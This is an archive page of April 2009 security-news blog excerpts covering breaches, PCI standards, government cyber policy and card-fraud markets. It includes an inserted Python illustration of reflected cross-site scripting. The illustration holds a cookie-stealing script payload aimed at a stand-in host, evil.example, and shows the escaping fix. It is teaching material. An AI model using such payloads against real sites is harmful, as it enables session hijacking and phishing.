Monthly Archive for April, 2009

IRS Awards Tax Payment Contract to RBS Worldpay

The Internal Revenue Service has awarded a contract to process tax return payments for the coming filing season to RBS Worldpay, a company that recently disclosed that a hacker break-in jeopardized financial data on 1.5 million payroll card holders and at least 1.1 million Social Security numbers. The contract award comes a month after credit card giant Visa said RBS was no longer in compliance with the Payment Card Industry (PCI) security standards, a set of guidelines designed to protect cardholder data. RBS spokesman Josh Passman said the company expects to be re-certified as PCI compliant "within the next few weeks." The contract awarded to RBS is what's known as a "zero dollar" contract, meaning the government doesn't award a specific dollar amount. Rather, the approved vendor takes a convenience fee for each transaction it processes. According to a copy of the contract listed at fedbizopps.gov, RBS's base convenience

Obama’s Cyber Czar Offers Few Details on Govt. Strategy

Those who were hoping to hear details today about how the Obama administration plans to revamp the government's approach to cyber security threats may have to wait a little while longer. In a much-anticipated speech at the RSA security conference in San Francisco today, Melissa Hathaway, the White House's top cyber official, instead highlighted all of the meetings, studies, and recommendations that have informed the administration's 60-day cyberspace policy review, which was completed last week. But details about how the administration might seek to organize and streamline the government's cyber efforts were lacking. Much of the coverage of the administration's cyber review has focused on the power struggle on cyber underway between the Department of Homeland Security and the National Security Agency. The Obama administration also is finalizing plans for a new Pentagon command to coordinate the security of military computer networks and to develop new offensive cyber weapons. Meanwhile,


Congress Investigating P2P Data Breaches

A key oversight panel in the House of Representatives said this week that it is re-opening an investigation into the "inadvertent sharing" of sensitive government and consumer data through popular peer-to-peer file swapping programs such as BearShare and Limewire. The inquiry from the House Committee on Oversight and Government Reform comes just weeks after revelations that blueprints for Marine One -- President Barack Obama's helicopter -- were being traded on P2P networks. Committee Chairman Edolphus Towns (D-N.Y.) and ranking Republican Darrell E. Issa (Calif.) sent a letter (PDF) to Attorney General Eric Holder, asking the Justice Department to detail what it is doing to protect Americans from the dangers of data breaches via P2P networks. The committee also asked (PDF) Federal Trade Commission Chairman Jonathan Leibowitz what his agency was doing to investigate P2P networks, and whether the makers of P2P software were adequately disclosing to consumers the risks associated

Time for an Internet A-Team?

Last week, I spoke to Joe Stewart, a senior security researcher at Atlanta-based SecureWorks who probably has done more than any other researcher to make life more difficult and expensive for cyber crooks. Stewart is speaking at the RSA Security conference in San Francisco on Thursday about what he thinks can be done to institutionalize some of these efforts. Stewart says the world needs a more concerted effort to identify -- if not apprehend -- top cyber criminal actors. He also said that ISPs need to be held more accountable when they ignore overt signs of persistent criminal activity on their networks. What follows are some excerpts from our discussion: Stewart: We've had some small victories here and there, but overall the Internet security community hasn't been terribly effective. We're not really stopping them. BK: Why do you think that is? Stewart: One of the conclusions we came to

Cyber Spies Breach Pentagon’s Fighter Jet Project

Cyber spies have broken into the Pentagon's $300 billion Joint Strike Fighter project - the defense department's costliest weapons program ever, according to the lead item in today's Wall Street Journal. From the story: Similar incidents have also breached the Air Force's air-traffic-control system in recent months, these people say. In the case of the fighter-jet program, the intruders were able to copy and siphon off several terabytes of data related to design and electronics systems, officials say, potentially making it easier to defend against the craft. Attacks like these -- or U.S. awareness of them -- appear to have escalated in the past six months, said one former official briefed on the matter. "There's never been anything like it," this person said, adding that other military and civilian agencies as well as private companies are affected. "It's everything that keeps this country going. The disclosure is the latest tale

World’s First Mac Botnet? Not Quite.

This morning, as I scrolled down the list of security Web sites I normally check via my RSS reader, I noticed several items referencing news about the "world's first Mac botnet." As I read on, it became clear this was neither news nor a first. Ryan Naraine from ZDNet.com writes about a paper released via Virus Bulletin (subscription required) by a pair of Symantec researchers who found what was described as "the first Mac OS X botnet launching denial-of-service attacks." The story goes on to describe how the researchers traced the botnet back to Mac users who had installed pirated copies of Apple's iWork 2009 software. Back in January, many tech outlets wrote about a Trojan that was being distributed with copies of iWork 2009 that were available on Bittorrent and other file-sharing services. In my own coverage of that Trojan, I interviewed Pete Yandell, a software developer from Australia

Creating a Public Nuisance with Insecure Web Sites

Thousands of Web sites that were cited last year for harboring security flaws that could be used to attack others online remain a hazard and an eyesore along the information superhighway. At issue are sites that harbor so-called cross-site scripting (XSS) vulnerabilities, which occur when Web sites accept input from a user -- usually from something like a search box or e-mail form -- and echo it back into the page without encoding it, so that script or other instructions supplied by an attacker run in the visitor's browser as if they came from the site itself. Because the attacker's code can travel in the query string of a link, the resulting URL points at the legitimate site and can be used for phishing scams. Unlike other scams, the URLs used in these cases look more legitimate. A typical XSS attack usually goes like this: The bad guys send out e-mails designed to look like they were sent by a trusted e-commerce company. The e-mails instruct recipients to click on a link and update their account information. Instead of
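To make the search-box case above concrete, here is an added example that is not code from the original post or from any of the sites it refers to. It simulates a search page that reflects the `q` parameter, once unescaped and once HTML-encoded, and builds the kind of link an attacker would mail out. The site name `shop.example.com`, the parameter name `q`, the payload and the collecting host `evil.example` are all hypothetical, chosen only for illustration.

```python
"""Reflected XSS via a search box: vulnerable and hardened renderers.

Constructed example for illustration; the site, parameter, payload and
collection host are hypothetical, not taken from the article.
"""
import html
from urllib.parse import parse_qs, urlencode, urlsplit

TRUSTED_SITE = "https://shop.example.com"  # hypothetical e-commerce site

# Hypothetical payload: exfiltrate the victim's cookies to an attacker host.
PAYLOAD = (
    "<script>document.location="
    "'https://evil.example/steal?c='+document.cookie</script>"
)


def render_search_vulnerable(query: str) -> str:
    """Echoes the raw query into the page; attacker markup becomes live HTML."""
    return f"<h1>Results for: {query}</h1>"


def render_search_safe(query: str) -> str:
    """Same page, but HTML-encodes the query so '<' becomes '&lt;' etc."""
    return f"<h1>Results for: {html.escape(query, quote=True)}</h1>"


def phishing_link(payload: str) -> str:
    """The link an attacker mails out: it really does point at the trusted site,
    with the payload percent-encoded into the query string."""
    return f"{TRUSTED_SITE}/search?" + urlencode({"q": payload})


def serve(url: str, renderer) -> str:
    """Simulates the server: decode q from the request URL and render the page."""
    q = parse_qs(urlsplit(url).query).get("q", [""])[0]
    return renderer(q)


def script_executes(page_html: str) -> bool:
    """Crude check for the demo: an unescaped <script ...> tag in the response
    is what a victim's browser would execute."""
    return "<script" in page_html.lower()


if __name__ == "__main__":
    link = phishing_link(PAYLOAD)
    print("link mailed to victims:", link)
    print("vulnerable page runs script:", script_executes(serve(link, render_search_vulnerable)))
    print("escaped page runs script:   ", script_executes(serve(link, render_search_safe)))
```

The mailed link contains no literal `<` or `>` (they are percent-encoded), which is part of why it looks harmless; the server decodes them and, in the vulnerable renderer, hands the tag straight to the browser. `html.escape` is the minimum fix for text placed in HTML body context; attribute, URL and JavaScript contexts each need their own encoding, and a Content-Security-Policy that forbids inline script limits the damage when an encoding is missed.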


Hackers Test Limits of Credit Card Security Standards

The number, scale and sophistication of data breaches fueled by hackers last year is rekindling the debate over the efficacy of the credit card industry's security standards for safeguarding customer data. All merchants that handle credit and debit card data are required to show that they have met the payment card industry data security standards (PCI DSS), a set of technical and operational requirements designed to safeguard cardholder information from theft or unauthorized access. Yet, some of the most notable data breach incidents last year targeted companies that had recently been certified as compliant with those standards, raising the question of whether the standards go far enough, or if entities that experienced a breach are falling out of compliance with the practices that led to their certification. In a recent hearing on PCI standards at a House Homeland Security Committee panel, experts from the retail sector charged that the entire

Glut of Stolen Banking Data Trims Profits for Thieves

A massive glut in the number of credit and debit cards stolen in data breaches at financial institutions last year has flooded criminal underground markets that trade in this material, driving prices for the illicit goods to the lowest levels seen in years, experts have found. For a glimpse of just how many financial records were lost to hackers last year, consider the stats released this week by Verizon Business. The company said it responded to at least 90 confirmed data breaches last year involving roughly 285 million consumer records, a number that exceeded the combined total number of breached records from cases the company investigated from 2004 to 2007. Breaches at banks and financial institutions were responsible for 93 percent of all such records compromised last year, Verizon found. As a result, the stolen identities and credit and debit cards for sale in the underground markets is outpacing demand